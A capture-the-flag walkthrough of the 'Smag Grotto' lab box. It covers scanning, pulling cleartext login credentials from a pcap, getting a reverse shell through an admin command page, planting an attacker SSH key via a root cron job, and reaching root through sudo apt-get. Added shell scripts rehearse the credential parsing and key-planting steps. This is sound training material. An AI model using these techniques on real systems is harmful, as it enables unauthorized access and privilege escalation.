# Smag Grotto

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNr6CDrPJYdDy1cfsG%2F-MdNr9Zra4YUR6aP-42j%2Fimage.png?alt=media\&token=22bbf5f3-e754-424d-aec5-66f806bb215a)

## Scanning

Let's run nmap scans to find open ports and services.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNr6CDrPJYdDy1cfsG%2F-MdNrscq3XY8fVHf_A1O%2Fimage.png?alt=media\&token=24bd7c6d-cc24-49be-b761-24d4d6db42d0)
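An added example, not the writeup's own commands: the two-stage scan a practitioner actually runs, a fast full-port sweep followed by a script/version scan of only the open ports, plus picking out the HTTP ports that gobuster should be pointed at. The `-oG` line below is constructed for the demo (the writeup only shows its scan as a screenshot) and `10.10.10.10` is a placeholder target.

```shell
# Added example, not the writeup's own commands: turn the grepable output of
# a full-port sweep into the port list for the targeted service scan, and pick
# out the HTTP ports for gobuster. The -oG line is constructed for the demo;
# 10.10.10.10 is a placeholder target.

SAMPLE_GNMAP='Host: 10.10.10.10 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///  Ignored State: filtered (65532)'

# Comma-separated list of every open TCP port in a -oG line, e.g. "22,80".
open_ports() {                     # open_ports "<gnmap text>"
    printf '%s\n' "$1" | tr ',' '\n' | grep -o '[0-9][0-9]*/open/' | cut -d/ -f1 | paste -sd, -
}

# Open ports whose nmap service name matches, e.g. service_ports "$line" http -> "80".
# A -oG port entry is port/state/proto/owner/service/rpc/version/.
service_ports() {                  # service_ports "<gnmap text>" <service>
    printf '%s\n' "$1" | tr ',' '\n' | grep -o '[0-9][0-9]*/open/tcp//'"$2"'/' | cut -d/ -f1 | paste -sd, -
}

# The workflow on a real target: sweep all ports quickly, then script/version
# scan only the open ones, and run gobuster against each HTTP port:
#   nmap -p- --min-rate 1000 -oG sweep.gnmap 10.10.10.10
#   nmap -sC -sV -p"$(open_ports "$(cat sweep.gnmap)")" 10.10.10.10
#   for p in $(service_ports "$(cat sweep.gnmap)" http | tr ',' ' '); do
#       gobuster dir -u "http://10.10.10.10:$p/" -w /usr/share/wordlists/dirb/common.txt
#   done
open_ports "$SAMPLE_GNMAP"          # 22,80
service_ports "$SAMPLE_GNMAP" http  # 80
```

Scanning all 65535 ports with `-sC -sV` in one go is slow; separating the sweep from the service scan keeps the expensive probes to the handful of ports that are actually open.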

## Enumeration

Let's visit the website.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNrvagSxQZ9AP6Qe2l%2F-MdNsP4_CRofOqveFNpQ%2Fimage.png?alt=media\&token=e4b0fdff-6567-4301-8f03-a66dd724f3b0)

Let's run a gobuster scan.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNsQZQGnVtgRT9We5m%2F-MdNtT-zTrLa7pLm7zi7%2Fimage.png?alt=media\&token=fc64282d-1804-423b-9d97-5389e732facb)

Let's visit this directory.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNsQZQGnVtgRT9We5m%2F-MdNtdkHCT299hTXaWA5%2Fimage.png?alt=media\&token=86bcd22f-efb2-4d9c-b594-188b553353e7)

Let's look at the source code.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNsQZQGnVtgRT9We5m%2F-MdNttCrcY5uiy0sXbxQ%2Fimage.png?alt=media\&token=60ffbb3b-cc85-474c-bb18-a508d4b96a6f)

We have an email address and a link that downloads a pcap file onto our machine. Let's open the file in Wireshark.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNsQZQGnVtgRT9We5m%2F-MdNufmnTOpZjFdSwl98%2Fimage.png?alt=media\&token=e3e3857b-e2d1-427a-b2c6-2050a93f81f1)

Let's look at the packet details by right-clicking a packet and choosing `Follow > TCP Stream`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNvmSsQdjRG4S45w1F%2Fimage.png?alt=media\&token=b27cd6d5-1315-4faf-9569-438206e5c26e)

The stream is a plaintext HTTP login, so we have a username and a password. We also have a hostname the request was sent to; let's add it to our `/etc/hosts` file, pointing at the target IP, so that name resolves to the machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNwlGFddj-5LyJJABE%2Fimage.png?alt=media\&token=458a1393-58ca-4501-be4b-7da2c33ebfad)
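An added example, not the writeup's own commands: pulling the three things the next steps need out of the text that `Follow > TCP Stream` shows for a plaintext HTTP login: the `Host` header (the name to add to `/etc/hosts`), and the username and password from the POST body. The stream below is constructed for this demo; `dev.example.thm` and the password are placeholders, not the values from the box.

```shell
# Added example, not the writeup's own commands: parse a followed TCP stream
# of a plaintext HTTP login and extract the Host header, the username and the
# password. SAMPLE_STREAM is constructed; the vhost and password are
# placeholders.

SAMPLE_STREAM='POST /login.php HTTP/1.1
Host: dev.example.thm
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

username=helpdesk&password=secret123
HTTP/1.1 200 OK
Content-Type: text/html
'

# Host header of the first request in the stream (CRLF stripped).
stream_host() {                       # stream_host "<stream text>"
    printf '%s\n' "$1" | tr -d '\r' | sed -n 's/^Host:[[:space:]]*//p' | head -n 1
}

# Body of the first request: the first blank line ends the headers, the next
# non-empty line is the urlencoded form.
stream_body() {                       # stream_body "<stream text>"
    printf '%s\n' "$1" | tr -d '\r' | awk 'body && NF { print; exit } /^$/ { body = 1 }'
}

# One field from an application/x-www-form-urlencoded body. Real captures may
# be percent-encoded; decode a value containing % before reusing it.
form_field() {                        # form_field "<body>" <name>
    printf '%s\n' "$1" | tr '&' '\n' | sed -n "s/^$2=//p" | head -n 1
}

# /etc/hosts line that makes the captured vhost resolve to the target.
hosts_line() {                        # hosts_line <target ip> "<stream text>"
    printf '%s %s\n' "$1" "$(stream_host "$2")"
}

# user:pass, the form curl/hydra expect.
creds() {                             # creds "<stream text>"
    body=$(stream_body "$1")
    printf '%s:%s\n' "$(form_field "$body" username)" "$(form_field "$body" password)"
}

hosts_line 10.10.10.10 "$SAMPLE_STREAM"   # 10.10.10.10 dev.example.thm
creds "$SAMPLE_STREAM"                    # helpdesk:secret123
```

The same data can be pulled straight from the capture without the GUI with `tshark -r file.pcap -Y 'http.request.method == "POST"' -T fields -e http.host -e http.file_data`. The security-relevant point is the one the capture makes for us: the login form travels over unencrypted HTTP, so anyone on the path sees the credentials.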

Let's visit this site.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNx6t9lDp8tNYWsfFv%2Fimage.png?alt=media\&token=fd767dc3-8449-4f9d-aa51-ae63f9654152)

OK, so we have a login page for users and a login page for admins. The captured credentials belong to a helpdesk user, so let's log in at `admin.php`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNxWJ06Tb7nRyuiDK9%2Fimage.png?alt=media\&token=5e866f59-ca3d-46d9-b5a9-dcfebbdc9fe5)

We are logged in. The page lets us run commands on the server, so let's use it to get a reverse shell on the machine.

## Exploitation

Let's first start a netcat listener.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNyFhOQPEMGWiLcDSg%2Fimage.png?alt=media\&token=aa39c932-0068-4766-8aec-f21e8ad507a9)

Now let's run the reverse shell command through the admin page.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNyR3ChV-rQuOd4_Ob%2Fimage.png?alt=media\&token=2aca0bc2-4d71-4077-9104-7b16801287df)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNySe1k3LEuLZ4BEaO%2Fimage.png?alt=media\&token=2b4b3be2-5e2b-442f-a3c5-0c64a869bff7)

We have a reverse shell; let's stabilize it (the usual sequence: `python3 -c 'import pty; pty.spawn("/bin/bash")'`, or `python` on older boxes, then Ctrl-Z, `stty raw -echo; fg`, and `export TERM=xterm`).

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNycnERlmcRAM2XAWE%2Fimage.png?alt=media\&token=e0f88a5c-43a6-4f49-8530-1ce1148e03ae)

## Privilege Escalation

Looking around the machine, I found an interesting cron job in the system crontab.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO4nbn2tZqD1NXSvNM%2Fimage.png?alt=media\&token=68acc2bc-a370-4564-85e9-e88c32daa133)

The cron job copies Jake's backed-up SSH public key into his `authorized_keys`. The backup file is writable by our current user (otherwise this would not work), so we can generate our own key pair, put our public key into the backup file, and on the next run the job installs it for us; we can then SSH in with Jake's privileges.

Let's first generate our own SSH key pair on the attacking machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO5d3JzxkWAaRP5brQ%2Fimage.png?alt=media\&token=a261ce2b-4fc3-4e33-b790-7d8de9312533)

Now let's copy the public key and write it into the backup file on the machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO5qOO5Y5v99reiMvx%2Fimage.png?alt=media\&token=cd77d3b9-8053-4c6a-ab79-884242523492)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO6Ma5N65atxYePVoR%2Fimage.png?alt=media\&token=ab09765d-60eb-4b99-b77d-7a373336f761)

Now let's wait for the cron job to run (a few minutes at most) and then SSH in as `jake` with our private key.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO73uBZsC2AChQOyp0%2Fimage.png?alt=media\&token=eed21b48-8a44-4ccc-ae65-22f5b4c1eab1)
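An added example, not the writeup's own commands: a rehearsal of the key swap described in the steps above, run entirely inside a temp directory so the flow and its check can be verified offline before doing it on the target. The file paths and the cron job's exact command are assumptions (the real ones are only visible in the writeup's screenshot), and both key lines are constructed placeholders.

```shell
# Added example, not the writeup's own commands: rehearse the key swap against
# a cron job that copies a "backup" public key into a user's authorized_keys.
# Paths and the job's command are assumptions; key lines are placeholders.

WORK=$(mktemp -d)
BACKUP="$WORK/opt/backups/jake_id_rsa.pub.bak"   # assumed location of the backup key
AUTH="$WORK/home/jake/.ssh/authorized_keys"       # assumed target of the cron copy
mkdir -p "$(dirname "$BACKUP")" "$(dirname "$AUTH")"

# Constructed stand-in for Jake's legitimate key (not a real key).
printf 'ssh-rsa AAAAB3NzaC1yc2E...original jake@smag\n' > "$BACKUP"
cp "$BACKUP" "$AUTH"

# Our key: on the attacking machine run
#   ssh-keygen -t ed25519 -f ~/.ssh/jake_smag -N ''
# and paste the contents of ~/.ssh/jake_smag.pub here. This line is a
# constructed placeholder, not a usable key.
ATTACKER_PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5...attacker attacker@kali'

# Step 1 (as the low-privilege shell user): add our key to the backup file.
# The attack only works because this file is writable by us. Appending rather
# than overwriting keeps the owner's own key working.
plant_key() {                        # plant_key <backup_file> "<pubkey line>"
    [ -w "$1" ] || { echo "not writable: $1" >&2; return 1; }
    printf '%s\n' "$2" >> "$1"
}

# Step 2 (what root's cron job is assumed to do on every run).
run_cron_job() {                     # run_cron_job <backup_file> <authorized_keys>
    cat "$1" > "$2"
}

# Step 3: has the job installed our key yet? Exact, whole-line match.
key_installed() {                    # key_installed <authorized_keys> "<pubkey line>"
    grep -qxF "$2" "$1"
}

plant_key "$BACKUP" "$ATTACKER_PUBKEY"
if key_installed "$AUTH" "$ATTACKER_PUBKEY"; then
    echo "unexpected: key present before the cron job ran"
fi
run_cron_job "$BACKUP" "$AUTH"      # on the target: wait for the next cron run instead
if key_installed "$AUTH" "$ATTACKER_PUBKEY"; then
    echo "key installed; now: ssh -i ~/.ssh/jake_smag jake@<target>"
fi
```

On the target, `key_installed` is the check to run (or `cat` the `authorized_keys` file) before each SSH attempt, rather than guessing when the job has fired. The underlying flaw is not the cron job itself but a root-run job that trusts a file a low-privilege user can write.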

We can read the user flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7AK7UaFNgaZ67f2v%2Fimage.png?alt=media\&token=458a6a84-a984-4a87-acea-8f5ebd8a5861)

Let's run `sudo -l` to see what we can run as other users; it shows we can run `apt-get` as root.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7JGo060SmyHCRabE%2Fimage.png?alt=media\&token=37851735-e247-4423-8adc-56e186b1ac18)

Let's check [GTFOBins](https://gtfobins.github.io/gtfobins/apt-get/#sudo) for `apt-get`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7UAzVMdy8USs0Kh9%2Fimage.png?alt=media\&token=00925ed1-f57a-4ade-aaae-b7063093d8dd)

Let's use the third command, which abuses the `APT::Update::Pre-Invoke` hook: `apt-get update` runs the configured command before fetching anything, and because `sudo` runs `apt-get` as root, the shell it spawns is root.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7ZXjYtz-5TMe0FU2%2Fimage.png?alt=media\&token=e22300e1-7d2d-4584-8843-ad019d93a7a0)

We are now root and can read the root flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7gkNEOJhoPR9u-oM%2Fimage.png?alt=media\&token=64d13135-31be-43ba-a4de-dd51b9a7ddaa)
